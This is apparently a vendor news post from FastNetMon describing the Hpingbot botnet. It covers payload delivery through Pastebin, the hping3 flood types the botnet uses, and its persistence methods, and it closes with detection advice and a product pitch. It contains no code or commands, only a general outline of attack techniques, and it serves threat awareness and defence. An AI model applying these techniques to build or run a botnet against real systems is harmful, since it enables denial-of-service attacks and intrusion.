News A New Botnet Hpingbot Leveraging Pastebin and hping3 for DDoS

A newly discovered botnet family dubbed Hpingbot is gaining attention in the cybersecurity community for its novel approach to malware delivery and DDoS execution. Detected by NSFOCUS’s Fuying Lab in June 2025, Hpingbot is a cross-platform Go-based botnet actively targeting both Windows and Linux/IoT environments—and it’s evolving fast.

Payload Delivery via Pastebin

Unlike most botnets that use traditional infrastructure for malware delivery, Hpingbot cleverly uses Pastebin—a public text-sharing platform—to distribute payloads. It embeds multiple hard-coded Pastebin links to host instructions or shell scripts (payload.sh) that download and install the malicious binaries. This allows attackers to quickly update payloads without retooling the botnet, while staying under the radar.

Real-World Testing with NetData Targets

In early activity, Hpingbot was observed launching attacks against IPs hosting the NetData performance monitoring tool. These targets may have been used to test and validate the effectiveness of Hpingbot’s DDoS modules in live environments, a tactic that suggests boldness and operational confidence from the attackers.

DDoS Attacks Using hping3

The botnet’s name is derived from its use of hping3, a legitimate network testing tool repurposed to launch customised DDoS attacks. Supported attack types include:

  • SYN, ACK, and RST floods
  • UDP floods
  • Mixed-mode “BOTOX” attacks
  • Custom TCP flag combinations

Interestingly, the Windows variant does not support hping3, yet continues to spread actively—indicating a broader intent beyond DDoS.

Persistent and Modular Design

Hpingbot ensures system persistence using a mix of Systemd, SysVinit, and Cron jobs, making it resilient across varied Linux environments. Its architecture supports multiple processor types (amd64, ARM, MIPS, etc.), and its propagation module is split from the payload, following a growing trend in modular botnet design that enables better obfuscation and tighter control.

Continuous Evolution and Professional Development

Attackers have iterated on Hpingbot at least 10 times since mid-June, updating everything from installation scripts to payload logic and C&C server addresses. The speed of updates and sophistication of the delivery chain suggest the botnet is being maintained by a professional team, potentially for long-term campaigns.

Strategic Use in APT and Ransomware Ecosystems

Beyond DDoS, Hpingbot’s ability to download and execute arbitrary payloads makes it a prime candidate for use in advanced persistent threat (APT) or ransomware operations. As attackers increasingly weaponise botnets as initial access vectors, Hpingbot could serve as a stepping stone to more severe breaches.

FastNetMon’s Take

Hpingbot is a clear signal that botnets are evolving—leveraging public platforms, open-source tools, and agile development practices to outpace defenders. While its DDoS footprint is currently limited, its payload delivery capabilities and rapid iteration cycle demand attention.

At FastNetMon, we’re continuously monitoring the shifting DDoS landscape. Our real-time traffic analysis and detection tools help customers stay ahead of threats like Hpingbot by recognising unusual network behaviours early—before damage is done.

Stay Protected


If you’re running Linux or IoT systems, monitor for suspicious use of hping3, unexpected scheduled tasks, or traffic to Pastebin. Consider tightening SSH password policies and restricting outbound traffic to known-good domains to reduce exposure.


About FastNetMon

FastNetMon is a leading solution for network security, offering advanced DDoS detection and mitigation. With real-time analytics and rapid response capabilities, FastNetMon helps organisations protect their infrastructure from evolving cyber threats. For more information, visit https://fastnetmon.com

24/7 Tech Support

support@fastnetmon.com

Email Us

sales@fastnetmon.com